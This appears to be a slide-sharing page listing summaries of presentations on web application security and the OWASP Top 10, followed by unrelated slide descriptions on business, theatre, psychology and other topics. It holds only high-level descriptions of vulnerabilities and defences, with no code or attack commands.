General concepts of web application security vulnerabilities primarily based on OWASP Top 10 list-2007(I know its too old :-))
I, along with Sandeep and Vishal, presented on this at IIIT-Delhi college in April, 2014
Owasp Top 10 - Owasp Pune Chapter - January 2008abhijitapatil
The document discusses various cybersecurity topics including vulnerabilities, threats, attacks, and countermeasures. It provides an overview of the Open Web Application Security Project (OWASP) which focuses on improving application security. It also summarizes common web vulnerabilities like cross-site scripting (XSS), SQL injection, buffer overflows, and cross-site request forgery (CSRF). Recommendations are given to prevent these vulnerabilities.
The document discusses the Open Web Application Security Project (OWASP) and its Top 10 vulnerabilities. OWASP is an open source non-profit organization dedicated to web application security. The document outlines the OWASP Top 10 vulnerabilities from 2007, including Cross-Site Scripting (XSS), Injection Flaws, Malicious File Execution, and others. It then provides detailed explanations and examples of each vulnerability, as well as recommendations for prevention and mitigation.
+ Background & Basics of Web App Security, The HTTP Protocol, Web.
+ Application Insecurities, OWASP Top 10 Vulnerabilities (XSS, SQL Injection, CSRF, etc.)
+ Web App Security Tools (Scanners, Fuzzers, etc), Remediation of Web App
+ Vulnerabilities, Web Application Audits and Risk Assessment.
Web Application Security 101 was conducted by:
Vaibhav Gupta, Vishal Ashtana, Sandeep Singh from Null.
The document discusses web application security and provides an overview of common vulnerabilities like SQL injection, cross-site scripting (XSS), and cross-site request forgery (CSRF). It summarizes the OWASP Top 10 list of most critical web app security risks, including injection flaws, broken authentication, sensitive data exposure, and more. The document also offers best practices for developing more securely, like using prepared statements, validating and sanitizing input, and implementing authentication and session management properly.
The Open Web Application Security Project, is an online community that produces freely-available articles, methodologies, documentation, tools, and technologies in the field of web application security.
One of those projects, The OWASP Top Ten, provides a powerful awareness document for web application security. The OWASP Top Ten represents a broad consensus about what the most critical web application security flaws are.
The OWASP team recently released the 2017 revised and updated version of the ten most critical web application security risks and so we’ve created these flash cards for you, your friends, and your colleagues (especially product and engineering :) to test your knowledge and learn more about these important issues.
Company-wide security awareness is a powerful way to improve the overall security of your organization. So adorn your waiting rooms, cubicles, and snack rooms with these flash cards for easy learning and remembrance.
The document summarizes the OWASP Top 10 security threats. It describes each of the top 10 threats, including injection, broken authentication, cross-site scripting, insecure direct object references, security misconfiguration, sensitive data exposure, missing access controls, cross-site request forgery, use of vulnerable components, and unsafe redirects/forwards. For each threat, it provides a brief explanation of the meaning and potential impacts, such as data loss, account compromise, or full host takeover. The document encourages implementing people, process, and technology measures to address application security issues.
OWASP is a non-profit organization focused on improving web application security. It publishes guides on secure development practices and identifies the top web application vulnerabilities, known as the OWASP Top 10. These include injection flaws, broken authentication, cross-site scripting, insecure direct object references, security misconfiguration, sensitive data exposure, missing access controls, cross-site request forgery, use of vulnerable components, and unsafe redirects. OWASP provides resources to help developers avoid these risks and build more secure applications.
A walkthrough of web application defense strategies, based around the Open Web Application Security Project's top 10 list. Presented to the Classic City Developers Meetup in August 2017.
Secure web programming plus end users' awareness are the last line of defense against attacks targeted at the corporate systems, particularly web applications, in the era of world-wide web.
Most web application attacks occur through Cross Site Scripting (XSS), and SQL Injection. On the other hand, most web application vulnerabilities arise from weak coding with failure to properly validate users' input, and failure to properly sanitize output while displaying the data to the visitors.
The literature also confirms the following web application weaknesses in 2010: 26% improper output handling, 22% improper input handling, and 15% insufficient authentication, and others.
Abdul Rahman Sherzad, lecturer at Computer Science Faculty of Herat University, and Ph.D. student at Technical University of Berlin gave a presentation at 12th IT conference on Higher Education for Afghanistan in MoHE, and then conducted a seminar at Hariwa Institute of Higher Education in Herat, Afghanistan introducing web application security threats by demonstrating the security problems that exist in corporate systems with a strong emphasis on secure development. Major security vulnerabilities, secure design and coding best practices when designing and developing web-based applications were covered.
The main objective of the presentation was raising awareness about the problems that might occur in web-application systems, as well as secure coding practices and principles. The presentation's aims were to build security awareness for web applications, to discuss the threat landscape and the controls users should use during the software development lifecycle, to introduce attack methods, to discuss approaches for discovering security vulnerabilities, and finally to discuss the basics of secure web development techniques and principles.
OWASP Top 10 Vulnerabilities 2017- AppTranaIshan Mathur
Our latest OWASP Top Vulnerabilities Guide updated for new 2017 issues serves as a practical guide to understanding OWASP Top 10 vulnerabilities and preparing a response plan to counter these vulnerabilities.
Web App Security Presentation by Ryan Holland - 05-31-2017TriNimbus
Web App Security - A presentation by Ryan Holland, Sr. Director, Cloud Architecture at Alert Logic for the Vancouver AWS User Group Meetup on May 31, 2017.
The OWASP Top Ten is the de-facto web application security standard because it reflects the evolving threat landscape, providing organizations a framework to manage and mitigate application security risk.
This presentation examines the critical newcomers and pesky incumbents from both an offensive and defensive perspective. Our experts share their insight on how to harden Web applications and align your program towards OWASP compliance.
Security in the cloud protecting your cloud appsCenzic
The document discusses security best practices for cloud applications. It notes that 75% of cyber attacks target internet applications and over 400 new vulnerabilities are discovered each month. The top vulnerabilities include cross-site scripting, SQL injection, and insecure direct object references. The document provides examples of how these vulnerabilities can be exploited by hackers and recommends best practices like input validation, output encoding, secure authentication and session management to help protect applications.
Owasp Top 10 And Security Flaw Root CausesMarco Morana
The document discusses root causes of common web application security flaws and vulnerabilities known as the OWASP Top 10. It provides an overview of tactical and strategic approaches to address these issues, including threat modeling, mapping vulnerabilities to application architecture, and implementing security by design principles. Specific guidelines are given for securely handling authentication, authorization, cryptography, sessions, input validation, errors and logging.
Top 10 Web Security Vulnerabilities (OWASP Top 10)Brian Huff
The document summarizes the top 10 security vulnerabilities in web applications according to the Open Web Application Security Project (OWASP). These include injection flaws, cross-site scripting, broken authentication and session management, insecure direct object references, cross-site request forgery, security misconfiguration, insecure cryptographic storage, failure to restrict URL access, insufficient transport layer protection, and unvalidated redirects and forwards. Countermeasures for each vulnerability are also provided.
OWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security RisksAndre Van Klaveren
A presentation of the OWASP Top 10 2017 release candidate, expected to be finalized in summer 2017. Presented at the St. Louis CYBER meetup on Wednesday, June 7, 2017.
OWASP Top 10 2017 - New VulnerabilitiesDilum Bandara
New Vulnerabilities introduced in OWASP Top 10 2017. Cover Broken Access Control ,
XML External Entities (XXE), Insecure Deserialization, and Insufficient Logging & Monitoring, as well as solutions
OWASP Top 10 - 2017 Top 10 web application security risksKun-Da Wu
The OWASP team recently released the 2017 revised version of the ten most critical web application security risks. This presentation brief the OWASP Top 10 - 2017 for you to learn more about these important security issues.
International Journal of Engineering Research and Applications (IJERA) is an open access online peer reviewed international journal that publishes research and review articles in the fields of Computer Science, Neural Networks, Electrical Engineering, Software Engineering, Information Technology, Mechanical Engineering, Chemical Engineering, Plastic Engineering, Food Technology, Textile Engineering, Nano Technology & science, Power Electronics, Electronics & Communication Engineering, Computational mathematics, Image processing, Civil Engineering, Structural Engineering, Environmental Engineering, VLSI Testing & Low Power VLSI Design etc.
The OWASP Top 10 is a list published by OWASP that contains the ten most critical security vulnerabilities that threaten web applications. The document discusses the top 10 vulnerabilities including injection, broken authentication, sensitive data exposure, XML external entities, broken access control, security misconfiguration, cross-site scripting, insecure deserialization, using components with known vulnerabilities, and insufficient logging and monitoring. Prevention methods are provided for each vulnerability.
Unrestricted file upload CWE-434 - Adam Nurudini (ISACA)Adam Nurudini
File upload vulnerabilities are a devastating category of web application vulnerabilities. Without secure coding and configuration, an attacker can quickly compromise an affected system.
This presentation will discuss types, how to discover, exploit, and how to mitigate file upload vulnerabilities.
The document discusses backup file artifacts (BFAs), which occur when code editors or version control systems create backup files that are sometimes left exposed publicly. This can disclose source code or sensitive information. The document introduces BFAC, a tool written in Python to detect BFAs through automated testing. BFAC checks for various types of BFA patterns and artifacts from version control systems. It aims to be more comprehensive than existing vulnerability scanners. The document also provides examples of real-world BFA findings and discusses mitigations, such as developer awareness and access rules.
The document outlines the OWASP Top 10 application security risks for 2017. It discusses the top 10 risks which are injection, broken authentication, sensitive data exposure, XML external entities, broken access control, security misconfiguration, cross-site scripting, insecure deserialization, use of vulnerable components, and insufficient logging and monitoring. It provides details on each risk such as examples and how attackers can exploit them. The document also discusses OWASP's goal of raising awareness of application security needs and best practices for developers and organizations.
This document provides an introduction to web security and the OWASP Top 10. It begins with an introduction of the presenter and their background in cybersecurity competitions. It then covers the basics of how the web works using HTTP requests and responses. The major topics of web security are defined, including the likelihood of threats like SQL injection, XSS, and password breaches. An overview of the OWASP Top 10 is presented along with demonstrations of injection, broken authentication, sensitive data exposure, XXE, access control issues, XSS, insecure deserialization, using vulnerable components, and insufficient logging/monitoring. The document aims to educate about common web vulnerabilities and how to identify and address them.
This document discusses various web application security vulnerabilities like injection, cross-site scripting (XSS), cross-site request forgery (CSRF), security misconfiguration, and insecure direct object references. It provides examples of each vulnerability and methods for preventing them, such as input validation, output encoding, using parameterized queries, and generating unique identifiers. The document also covers topics like HTTP, sessions, cookies and the importance of keeping software updated.
Gilda's Club 2011 "Live! From South Florida...It's Saturday Night!" Virtual ...Gilda's Club South Florida
This document provides information about the 16th Annual event for Gilda's Club South Florida including the mission statement, event details, sponsors, committee members, and more. The event will feature a national touring comic, Dean Napolitano, and be emceed by Drew Sattee. Gilda's Club South Florida thanks their many sponsors, volunteers, and partners who helped make the event possible.
A walkthrough of web application defense strategies, based around the Open Web Application Security Project's top 10 list. Presented to the Classic City Developers Meetup in August 2017.
Secure web programming plus end users' awareness are the last line of defense against attacks targeted at the corporate systems, particularly web applications, in the era of world-wide web.
Most web application attacks occur through Cross Site Scripting (XSS), and SQL Injection. On the other hand, most web application vulnerabilities arise from weak coding with failure to properly validate users' input, and failure to properly sanitize output while displaying the data to the visitors.
The literature also confirms the following web application weaknesses in 2010: 26% improper output handling, 22% improper input handling, and 15% insufficient authentication, and others.
Abdul Rahman Sherzad, lecturer at Computer Science Faculty of Herat University, and Ph.D. student at Technical University of Berlin gave a presentation at 12th IT conference on Higher Education for Afghanistan in MoHE, and then conducted a seminar at Hariwa Institute of Higher Education in Herat, Afghanistan introducing web application security threats by demonstrating the security problems that exist in corporate systems with a strong emphasis on secure development. Major security vulnerabilities, secure design and coding best practices when designing and developing web-based applications were covered.
The main objective of the presentation was raising awareness about the problems that might occur in web-application systems, as well as secure coding practices and principles. The presentation's aims were to build security awareness for web applications, to discuss the threat landscape and the controls users should use during the software development lifecycle, to introduce attack methods, to discuss approaches for discovering security vulnerabilities, and finally to discuss the basics of secure web development techniques and principles.
OWASP Top 10 Vulnerabilities 2017- AppTranaIshan Mathur
Our latest OWASP Top Vulnerabilities Guide updated for new 2017 issues serves as a practical guide to understanding OWASP Top 10 vulnerabilities and preparing a response plan to counter these vulnerabilities.
Web App Security Presentation by Ryan Holland - 05-31-2017TriNimbus
Web App Security - A presentation by Ryan Holland, Sr. Director, Cloud Architecture at Alert Logic for the Vancouver AWS User Group Meetup on May 31, 2017.
The OWASP Top Ten is the de-facto web application security standard because it reflects the evolving threat landscape, providing organizations a framework to manage and mitigate application security risk.
This presentation examines the critical newcomers and pesky incumbents from both an offensive and defensive perspective. Our experts share their insight on how to harden Web applications and align your program towards OWASP compliance.
Security in the cloud protecting your cloud appsCenzic
The document discusses security best practices for cloud applications. It notes that 75% of cyber attacks target internet applications and over 400 new vulnerabilities are discovered each month. The top vulnerabilities include cross-site scripting, SQL injection, and insecure direct object references. The document provides examples of how these vulnerabilities can be exploited by hackers and recommends best practices like input validation, output encoding, secure authentication and session management to help protect applications.
Owasp Top 10 And Security Flaw Root CausesMarco Morana
The document discusses root causes of common web application security flaws and vulnerabilities known as the OWASP Top 10. It provides an overview of tactical and strategic approaches to address these issues, including threat modeling, mapping vulnerabilities to application architecture, and implementing security by design principles. Specific guidelines are given for securely handling authentication, authorization, cryptography, sessions, input validation, errors and logging.
Top 10 Web Security Vulnerabilities (OWASP Top 10)Brian Huff
The document summarizes the top 10 security vulnerabilities in web applications according to the Open Web Application Security Project (OWASP). These include injection flaws, cross-site scripting, broken authentication and session management, insecure direct object references, cross-site request forgery, security misconfiguration, insecure cryptographic storage, failure to restrict URL access, insufficient transport layer protection, and unvalidated redirects and forwards. Countermeasures for each vulnerability are also provided.
OWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security RisksAndre Van Klaveren
A presentation of the OWASP Top 10 2017 release candidate, expected to be finalized in summer 2017. Presented at the St. Louis CYBER meetup on Wednesday, June 7, 2017.
OWASP Top 10 2017 - New VulnerabilitiesDilum Bandara
New Vulnerabilities introduced in OWASP Top 10 2017. Cover Broken Access Control ,
XML External Entities (XXE), Insecure Deserialization, and Insufficient Logging & Monitoring, as well as solutions
OWASP Top 10 - 2017 Top 10 web application security risksKun-Da Wu
The OWASP team recently released the 2017 revised version of the ten most critical web application security risks. This presentation brief the OWASP Top 10 - 2017 for you to learn more about these important security issues.
International Journal of Engineering Research and Applications (IJERA) is an open access online peer reviewed international journal that publishes research and review articles in the fields of Computer Science, Neural Networks, Electrical Engineering, Software Engineering, Information Technology, Mechanical Engineering, Chemical Engineering, Plastic Engineering, Food Technology, Textile Engineering, Nano Technology & science, Power Electronics, Electronics & Communication Engineering, Computational mathematics, Image processing, Civil Engineering, Structural Engineering, Environmental Engineering, VLSI Testing & Low Power VLSI Design etc.
The OWASP Top 10 is a list published by OWASP that contains the ten most critical security vulnerabilities that threaten web applications. The document discusses the top 10 vulnerabilities including injection, broken authentication, sensitive data exposure, XML external entities, broken access control, security misconfiguration, cross-site scripting, insecure deserialization, using components with known vulnerabilities, and insufficient logging and monitoring. Prevention methods are provided for each vulnerability.
Unrestricted file upload CWE-434 - Adam Nurudini (ISACA)Adam Nurudini
File upload vulnerabilities are a devastating category of web application vulnerabilities. Without secure coding and configuration, an attacker can quickly compromise an affected system.
This presentation will discuss types, how to discover, exploit, and how to mitigate file upload vulnerabilities.
The document discusses backup file artifacts (BFAs), which occur when code editors or version control systems create backup files that are sometimes left exposed publicly. This can disclose source code or sensitive information. The document introduces BFAC, a tool written in Python to detect BFAs through automated testing. BFAC checks for various types of BFA patterns and artifacts from version control systems. It aims to be more comprehensive than existing vulnerability scanners. The document also provides examples of real-world BFA findings and discusses mitigations, such as developer awareness and access rules.
The document outlines the OWASP Top 10 application security risks for 2017. It discusses the top 10 risks which are injection, broken authentication, sensitive data exposure, XML external entities, broken access control, security misconfiguration, cross-site scripting, insecure deserialization, use of vulnerable components, and insufficient logging and monitoring. It provides details on each risk such as examples and how attackers can exploit them. The document also discusses OWASP's goal of raising awareness of application security needs and best practices for developers and organizations.
This document provides an introduction to web security and the OWASP Top 10. It begins with an introduction of the presenter and their background in cybersecurity competitions. It then covers the basics of how the web works using HTTP requests and responses. The major topics of web security are defined, including the likelihood of threats like SQL injection, XSS, and password breaches. An overview of the OWASP Top 10 is presented along with demonstrations of injection, broken authentication, sensitive data exposure, XXE, access control issues, XSS, insecure deserialization, using vulnerable components, and insufficient logging/monitoring. The document aims to educate about common web vulnerabilities and how to identify and address them.
This document discusses various web application security vulnerabilities like injection, cross-site scripting (XSS), cross-site request forgery (CSRF), security misconfiguration, and insecure direct object references. It provides examples of each vulnerability and methods for preventing them, such as input validation, output encoding, using parameterized queries, and generating unique identifiers. The document also covers topics like HTTP, sessions, cookies and the importance of keeping software updated.
Gilda's Club 2011 "Live! From South Florida...It's Saturday Night!" Virtual ...Gilda's Club South Florida
This document provides information about the 16th Annual event for Gilda's Club South Florida including the mission statement, event details, sponsors, committee members, and more. The event will feature a national touring comic, Dean Napolitano, and be emceed by Drew Sattee. Gilda's Club South Florida thanks their many sponsors, volunteers, and partners who helped make the event possible.
This document is Scott Wells' graduate project analyzing his process of preparing for and performing the role of Sheridan Whiteside in a 2013 production of The Man Who Came to Dinner at Florida Atlantic University. Wells identified early problems with overacting the caricatured role. Through research on the playwrights' vision and the "clown-farce" style, Wells worked to find emotional depth behind the sarcasm and develop Whiteside as a boor with a heart of gold.
Anshuman Jain has over 8 years of experience in various roles including business development, project management, and administration. He is currently an executive at Syncom Formulations (India) Limited where he provides assistance to the CEO and handles various administrative tasks. The document outlines his professional experience, skills, education, and contact information while seeking new managerial opportunities.
This document provides an introduction to a book titled "Beyond Freud: A Study of Modern Psychoanalytic Theorists" edited by Joseph Reppen. The book contains chapters written by various authors on 14 modern psychoanalytic theorists who have expanded upon Freud's work. While the theorists presented have differing views and approaches, they are all informed by Freud's original ideas and continue to influence the field. The introduction provides background on the book's purpose and discusses some of the theorists that were not included. It aims to demonstrate how Freud's thinking has been built upon rather than disparage his work.
This document provides information about the Spring 2010 issue of the Marketing Management Journal, including the editors, production editor, publications council, and editorial review board. It also includes an index of article titles and authors in the issue. The high level information is that this document outlines the leadership and contents of the Spring 2010 issue of the Marketing Management Journal.
BGC Partners held an Investor & Analyst Day on May 29, 2014 to provide an overview and updates on the company. The presentation included:
- BGC has two business segments: Financial Services and Real Estate Services (Newmark Grubb Knight Frank)
- Financial Services revenues account for 62% of total revenues while Real Estate Services accounts for 36%
- BGC has a long track record of revenue growth and acquiring companies to expand its services
- Continuity of experienced executive and business management teams
This document discusses the growth of the private military and security company (PMSC) industry, with a focus on British companies. It notes that the UK is a major hub for PMSCs, with hundreds operating globally. Many British PMSCs are large corporations dominated by former military personnel. Iraq was a major incubator for the industry following the 2003 invasion, and British PMSCs continue to operate there providing security for governments and oil companies. The industry is also expanding into Africa to meet demand from extractive companies seeking security in unstable regions.
This document outlines an agenda for a webinar hosted by Cleantech Open on July 16, 2013 focusing on product/market fit and customer validation. The webinar will include a discussion of value creation through innovation, identifying customer segments for cleantech enterprises, defining value propositions, and conducting customer validation. It provides an overview of worksheets and judging criteria related to customer discovery, product/market fit, and interviewing customers in identified segments to validate value propositions.
The document provides background information on the slave revolt led by Spartacus from 73-71 BC in Rome. It discusses how Spartacus has become a symbol of rebellion against oppression. The passage then gives a brief overview of the origins and causes of the slave revolts in Rome in 135-132 BC and 104-100 BC that preceded Spartacus' revolt.
This document provides a publication list for Dr. Kevin D. Brown including 36 peer-reviewed publications from 1990 to 2008. The publications focus on characterizing cytoskeletal proteins, identifying their roles in cell cycle regulation and DNA damage response pathways, and investigating epigenetic silencing of tumor suppressor genes in cancer development.
ISON Technologies is a leading IT services provider in the Middle East, Africa, and India with over 500 employees worldwide. They offer a wide range of services including consulting, systems integration, application maintenance, data center and cloud services, IT infrastructure management, cyber security solutions, and more. They have a marquee client base across many industry verticals and have received several awards and recommendations for their work. Their case studies demonstrate solutions for clients such as Airtel, Etisalat, ENOC, and the General Pension and Social Security Authority of the UAE.
Central excise duty is levied on goods manufactured in India. The key points are:
1. Excise duty is an indirect tax collected on domestic production and consumption of goods. The manufacturer passes the duty to the consumer.
2. Duty is collected under the Central Excise Act at rates specified in the Central Excise Tariff Act. Additional duties may also apply to some goods.
3. Manufacturers must register with central excise authorities. The CENVAT scheme allows manufacturers to claim credit for duties paid on inputs.
Journal of International Business Research and Marketing (3)Katerina Panarina
This document discusses how cost-volume-profit analysis can be used for decision making in manufacturing industries in Nigeria. It defines cost-volume-profit analysis as the systematic examination of the relationships between selling prices, sales volume, production costs, expenses and profits. The analysis is used by managers to plan, control, and make decisions regarding revenues, costs, volume changes, taxes and profits. However, many manufacturing industries in Nigeria do not effectively employ cost-volume-profit analysis in their decision making processes due to managerial inefficiencies and lack of understanding of the technique. The study aims to examine the effect of cost-volume-profit analysis on decision making in selected Nigerian manufacturing industries.
Case Study - Fujitsu_Malaga_Perth - (TIA 942) - 20110722Chris Dow
The document compares the original design for a data center in Perth, WA using static UPS systems and standby diesel generators to an alternative design using Hitec Diesel Rotary UPS (DRUPS) systems. The DRUPS design simplified the distribution scheme, reduced equipment needs and costs, increased usable floor space, met tier III reliability standards, and lowered the total building load and operating expenses over 10 years compared to the original static UPS design. The completed Malaga Data Center facility utilizing the DRUPS solution won awards for energy efficiency and best building fit out over $20 million.
This document summarizes website designs and redesigns for several businesses. It describes providing websites for a management consultancy, pharmaceutical company, public relations firm, medical laboratory, and retail mart. The websites were designed to showcase each company's services and products, and provide online customization for furniture design for one client.
The goal of the Top 10 project is to raise awareness about application security by identifying some of the most critical risks facing organizations. The Top 10 project is referenced by many standards, books, tools, and organizations, including MITRE, PCI DSS, DISA, FTC, and many more. This release of the OWASP Top 10 marks this project’s eighth year of raising awareness of the importance of application security risks. The OWASP Top 10 was first released in 2003, minor updates were made in 2004 and 2007, and this is the 2010 release.
The document discusses cyber security topics like web security, Zed Attack Proxy (ZAP), SQL injection, Damn Vulnerable Web Application (DVWA), and WebGoat. It provides an overview of these topics, including what ZAP is used for, how to configure it, and how to use its features like intercepting traffic, scanning, and reporting. It also discusses the Open Web Application Security Project (OWASP) and some of the top 10 vulnerabilities like SQL injection.
Sergey Kochergan - OWASP Top 10 Web Application Vulnerabilities Braindev Kyiv
Sergey Kochergan is QA Engineer at Luxoft with extensive experience in software engineering and security field. As an independent consultant, he has provided strategic expertise to business clients with frameworks for SCADA security policy, organazied hackatons and ctf events. Sergey was involved into R&D projects of System Design for SDR communication hardware, network forensics with IDS.
In this lecture Sergey will tell the audience about Security in general, will make overview of nowadays Web Testing Environment and also will present his vision of Risk Rating Methodology and Vulnerability Patterns.
For our next events join us:
http://www.meetup.com/Kyiv-Dev-Meetup-SmartMonday/
https://www.facebook.com/braindevkyiv
Security testing is the process of identifying vulnerabilities in a system to protect data and ensure intended functionality. It involves testing confidentiality, integrity, authentication, availability, authorization, and non-repudiation. The security testing process includes planning, vulnerability scanning, assessment, penetration testing, and reporting. Types of security testing include static application, dynamic application, and penetration testing. The OWASP Top 10 list identifies the most critical web application security risks.
OWASP is an open community dedicated to enabling organizations to conceive, develop, acquire, operate, and maintain applications that can be trusted. All of the OWASP tools, documents, forums, and chapters are free and open to anyone interested in improving application security.
OWASP Top 10 List Overview for Web DevelopersBenjamin Floyd
The OWASP Top 10 List was recently updated for 2013, and many developers still do not know what it is or why they should care. It is a list of the top web security threats developers need to address to produce secure websites. Most developers aren't security experts, so the OWASP Top 10 Project has created resources designed for developers to quickly test their applications. Come hear about the list, why and how you can use it to make your job easier, and learn about resources you can use to quickly determine if your applications are addressing security threats properly.
Essential Security Practices for Modern Web Developers.pdfZinavo Pvt Ltd
Modern web developers must prioritize security by implementing practices like secure coding, regular updates, encryption, and vulnerability testing to protect applications.
OWASP Portland - OWASP Top 10 For JavaScript DevelopersLewis Ardern
With the release of the OWASP TOP 10 2017 we saw new issues rise as contenders of most common issues in the web landscape. Much of the OWASP documentation displays issues, and remediation advice/code relating to Java, C++, and C#; however not much relating to JavaScript. JavaScript has drastically changed over the last few years with the release of Angular, React, and Vue, alongside the popular use of NodeJS and its libraries/frameworks. This talk will introduce you to the OWASP Top 10 explaining JavaScript client and server-side vulnerabilities.
Break it while you make it: writing (more) secure softwareLeigh Honeywell
The document discusses core security principles for developers, including the three pillars of security (confidentiality, integrity, availability), common vulnerabilities like buffer overflows and injection flaws, security mindsets and architectures, and tools for testing applications. It provides an overview of the OWASP top 10 security risks and recommends resources for further learning about secure coding practices.
supraja technologies material for secure codingSri Latha
The document provides an introduction to the OWASP Top 10 list, which identifies the most critical web application security risks. It lists the top 10 risks as Injection, Broken Authentication, Sensitive Data Exposure, XML External Entities (XXE), Broken Access Control, Security Misconfiguration, Cross-Site Scripting (XSS), Insecure Deserialization, Using Components with Known Vulnerabilities, and Insufficient Logging & Monitoring. For each risk, it provides a brief description of the vulnerability, examples, and mitigation strategies. It also includes sections on Injection risks and root causes as well as mitigation strategies.
Drupal Security Basics for the DrupalJax January MeetupChris Hales
Basic security presentation for the Jacksonville, FL Drupal user group on how Drupal deals with the OWASP top 10 security risks of 2013.
I'l be expanding this to include additional details and examples in the next version.
The document provides guidelines for secure coding. It discusses the evolution of software markets and increased security threats. Common web attacks like injection, broken authentication, and sensitive data exposure are explained. The OWASP Top 10 list of vulnerabilities is reviewed. The document emphasizes the importance of secure coding practices like input validation, output encoding, and using components with no known vulnerabilities. Following a secure coding lifestyle can help developers write more secure code and protect against attacks.
The document discusses web penetration testing and the OWASP Top 10 vulnerabilities. It defines vulnerability as a flaw that can be exploited to compromise security, and threat as anything that can harm assets by exploiting vulnerabilities. Web penetration testing systematically evaluates application security controls. OWASP is dedicated to developing secure applications and APIs, and maintains the OWASP Top 10 list of the most critical web application security risks, including injection, broken authentication, sensitive data exposure, and more. Each risk is described in terms of what it is and its potential impacts.
This document summarizes information about the Süddeutsche Zeitung newspaper, the Panama Papers leak, known vulnerabilities, and essential security measures for web applications. It notes that the Süddeutsche Zeitung received a 2.6TB dataset of the Panama Papers leak over one year of research. The leak contained over 11.5 million documents from Mossack Fonseca dating back to the 1970s, exposing over 200,000 offshore entities and hundreds of famous names. Over $1.2 billion was recouped after investigations in over 80 countries. Known vulnerabilities that enabled the leak included an outdated version of Drupal, insecure Oracle forks, and vulnerable WordPress plugins. The document concludes with an overview of the
Massive Power Outage Hits Spain, Portugal, and France: Causes, Impact, and On...Aqusag Technologies
In late April 2025, a significant portion of Europe, particularly Spain, Portugal, and parts of southern France, experienced widespread, rolling power outages that continue to affect millions of residents, businesses, and infrastructure systems.
DevOpsDays Atlanta 2025 - Building 10x Development Organizations.pptxJustin Reock
Building 10x Organizations with Modern Productivity Metrics
10x developers may be a myth, but 10x organizations are very real, as proven by the influential study performed in the 1980s, ‘The Coding War Games.’
Right now, here in early 2025, we seem to be experiencing YAPP (Yet Another Productivity Philosophy), and that philosophy is converging on developer experience. It seems that with every new method we invent for the delivery of products, whether physical or virtual, we reinvent productivity philosophies to go alongside them.
But which of these approaches actually work? DORA? SPACE? DevEx? What should we invest in and create urgency behind today, so that we don’t find ourselves having the same discussion again in a decade?
AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...Alan Dix
Talk at the final event of Data Fusion Dynamics: A Collaborative UK-Saudi Initiative in Cybersecurity and Artificial Intelligence funded by the British Council UK-Saudi Challenge Fund 2024, Cardiff Metropolitan University, 29th April 2025
https://alandix.com/academic/talks/CMet2025-AI-Changes-Everything/
Is AI just another technology, or does it fundamentally change the way we live and think?
Every technology has a direct impact with micro-ethical consequences, some good, some bad. However more profound are the ways in which some technologies reshape the very fabric of society with macro-ethical impacts. The invention of the stirrup revolutionised mounted combat, but as a side effect gave rise to the feudal system, which still shapes politics today. The internal combustion engine offers personal freedom and creates pollution, but has also transformed the nature of urban planning and international trade. When we look at AI the micro-ethical issues, such as bias, are most obvious, but the macro-ethical challenges may be greater.
At a micro-ethical level AI has the potential to deepen social, ethnic and gender bias, issues I have warned about since the early 1990s! It is also being used increasingly on the battlefield. However, it also offers amazing opportunities in health and educations, as the recent Nobel prizes for the developers of AlphaFold illustrate. More radically, the need to encode ethics acts as a mirror to surface essential ethical problems and conflicts.
At the macro-ethical level, by the early 2000s digital technology had already begun to undermine sovereignty (e.g. gambling), market economics (through network effects and emergent monopolies), and the very meaning of money. Modern AI is the child of big data, big computation and ultimately big business, intensifying the inherent tendency of digital technology to concentrate power. AI is already unravelling the fundamentals of the social, political and economic world around us, but this is a world that needs radical reimagining to overcome the global environmental and human challenges that confront us. Our challenge is whether to let the threads fall as they may, or to use them to weave a better future.
Quantum Computing Quick Research Guide by Arthur MorganArthur Morgan
This is a Quick Research Guide (QRG).
QRGs include the following:
- A brief, high-level overview of the QRG topic.
- A milestone timeline for the QRG topic.
- Links to various free online resource materials to provide a deeper dive into the QRG topic.
- Conclusion and a recommendation for at least two books available in the SJPL system on the QRG topic.
QRGs planned for the series:
- Artificial Intelligence QRG
- Quantum Computing QRG
- Big Data Analytics QRG
- Spacecraft Guidance, Navigation & Control QRG (coming 2026)
- UK Home Computing & The Birth of ARM QRG (coming 2027)
Any questions or comments?
- Please contact Arthur Morgan at [email protected].
100% human made.
Designing Low-Latency Systems with Rust and ScyllaDB: An Architectural Deep DiveScyllaDB
Want to learn practical tips for designing systems that can scale efficiently without compromising speed?
Join us for a workshop where we’ll address these challenges head-on and explore how to architect low-latency systems using Rust. During this free interactive workshop oriented for developers, engineers, and architects, we’ll cover how Rust’s unique language features and the Tokio async runtime enable high-performance application development.
As you explore key principles of designing low-latency systems with Rust, you will learn how to:
- Create and compile a real-world app with Rust
- Connect the application to ScyllaDB (NoSQL data store)
- Negotiate tradeoffs related to data modeling and querying
- Manage and monitor the database for consistently low latencies
Role of Data Annotation Services in AI-Powered ManufacturingAndrew Leo
From predictive maintenance to robotic automation, AI is driving the future of manufacturing. But without high-quality annotated data, even the smartest models fall short.
Discover how data annotation services are powering accuracy, safety, and efficiency in AI-driven manufacturing systems.
Precision in data labeling = Precision on the production floor.
Book industry standards are evolving rapidly. In the first part of this session, we’ll share an overview of key developments from 2024 and the early months of 2025. Then, BookNet’s resident standards expert, Tom Richardson, and CEO, Lauren Stewart, have a forward-looking conversation about what’s next.
Link to recording, presentation slides, and accompanying resource: https://bnctechforum.ca/sessions/standardsgoals-for-2025-standards-certification-roundup/
Presented by BookNet Canada on May 6, 2025 with support from the Department of Canadian Heritage.
Spark is a powerhouse for large datasets, but when it comes to smaller data workloads, its overhead can sometimes slow things down. What if you could achieve high performance and efficiency without the need for Spark?
At S&P Global Commodity Insights, having a complete view of global energy and commodities markets enables customers to make data-driven decisions with confidence and create long-term, sustainable value. 🌍
Explore delta-rs + CDC and how these open-source innovations power lightweight, high-performance data applications beyond Spark! 🚀
TrsLabs - Fintech Product & Business ConsultingTrs Labs
Hybrid Growth Mandate Model with TrsLabs
Strategic Investments, Inorganic Growth, Business Model Pivoting are critical activities that business don't do/change everyday. In cases like this, it may benefit your business to choose a temporary external consultant.
An unbiased plan driven by clearcut deliverables, market dynamics and without the influence of your internal office equations empower business leaders to make right choices.
Getting things done within a budget within a timeframe is key to Growing Business - No matter whether you are a start-up or a big company
Talk to us & Unlock the competitive advantage
What is Model Context Protocol(MCP) - The new technology for communication bw...Vishnu Singh Chundawat
